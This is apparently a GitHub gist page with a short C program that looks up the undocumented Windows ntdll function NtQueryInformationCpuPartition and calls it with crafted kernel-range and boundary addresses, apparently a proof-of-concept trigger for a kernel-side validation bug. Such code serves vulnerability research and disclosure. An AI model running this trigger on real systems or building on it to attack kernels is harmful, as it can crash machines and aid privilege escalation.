Created
October 5, 2021 10:33
-
-
Save hfiref0x/48bdc12241d0a981a6da473e979c8aff to your computer and use it in GitHub Desktop.
Revisions
-
hfiref0x created this gist
Oct 5, 2021 .There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -0,0 1,51 @@ #include <Windows.h> #include <cstdio> typedef NTSTATUS(NTAPI* pfnNtQueryInformationCpuPartition)( ULONG_PTR PartitionHandle, ULONG_PTR Flags, ULONG_PTR OutputBuffer, ULONG_PTR Length, ULONG_PTR ReturnedLength ); #define FUNC_NAME "NtQueryInformationCpuPartition" int main() { HMODULE hDll = GetModuleHandle(TEXT("ntdll.dll")); pfnNtQueryInformationCpuPartition pvfn; printf_s("[>]Start\r\n"); if (hDll) { pvfn = (pfnNtQueryInformationCpuPartition)GetProcAddress(hDll, FUNC_NAME); if (pvfn) { NTSTATUS ntStatus = pvfn(0x00007ffffffefffe, 0xffff800000000001, 0x0000800000000000, 0x000000000000fffe, 0xfffff80000000000); printf_s(">%s NTSTATUS 0x%lX\r\n", FUNC_NAME, ntStatus); } else { DWORD lastError = GetLastError(); printf_s(">%s not found, GetLastError %lu\r\n", FUNC_NAME, lastError); } } else { printf_s(">No dll handle\r\n"); } printf_s("[<]Stop"); ExitProcess(0); }